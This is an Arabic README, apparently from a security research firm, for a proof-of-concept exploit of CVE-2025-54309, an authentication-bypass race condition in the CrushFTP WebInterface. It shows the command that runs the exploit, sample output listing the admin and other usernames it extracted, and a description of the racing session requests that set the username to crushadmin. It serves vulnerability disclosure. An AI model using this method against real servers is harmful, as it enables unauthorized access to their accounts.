
استغلال إثبات المفهوم لـ CVE-2025-54309، يوضح تجاوز المصادقة عبر حالة سباق في CrushFTP WebInterface لتعداد المستخدمين.
إثبات مفهوم لتجاوز المصادقة في CrushFTP
انظر منشور مدونتنا للحصول على التفاصيل التقنية
python3 watchTowr-vs-CrushFTP-CVE-2025-54309.py http://127.0.0.1:8082
[*] Generated new c2f value: 6XDQ
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-CrushFTP-CVE-2025-54309.py
(*) CrushFTP Authentication Bypass Race Condition PoC
- Sonny , watchTowr ([email protected])
CVEs: [CVE-2025-54309]
[*] CRUSHFTP RACE CONDITION POC
[*] TARGET: http://127.0.0.1:8082
[*] ENDPOINT: CrushFTP WebInterface getUserList
[*] ATTACK: 5000 requests with new c2f every 50 requests
============================================================
Starting race with 5000 request pairs...
============================================================
[*] Generated new c2f value: qUwd
[*] NEW SESSION: c2f=qUwd
[*] EXFILTRATED 3 USERS: crushadmin, default, TempAccount
[*] VULNERABLE! RACE CONDITION POSSIBLE!
هذا البرنامج النصي هو إثبات مفهوم لـ CVE-2025-54309 ضد واجهات CrushFTP. من خلال إنشاء مجموعة من طلبات السباق التي تشترك في نفس معرفات الجلسة، طلب واحد لتعيين خاصية اسم المستخدم إلى "crushadmin" وطلب واحد لتنفيذ أمر مصادق عليه كمسؤول (crushadmin)، يمكن في هذا الإثبات استخراج قائمة أسماء المستخدمين. تم وصف المزيد من التفاصيل في [منشور مدونتنا] (https://labs.watchtowr.com/).
مزيد من التفاصيل في بيان CrushFTP
للحصول على أحدث الأبحاث الأمنية تابع فريق watchTowr Labs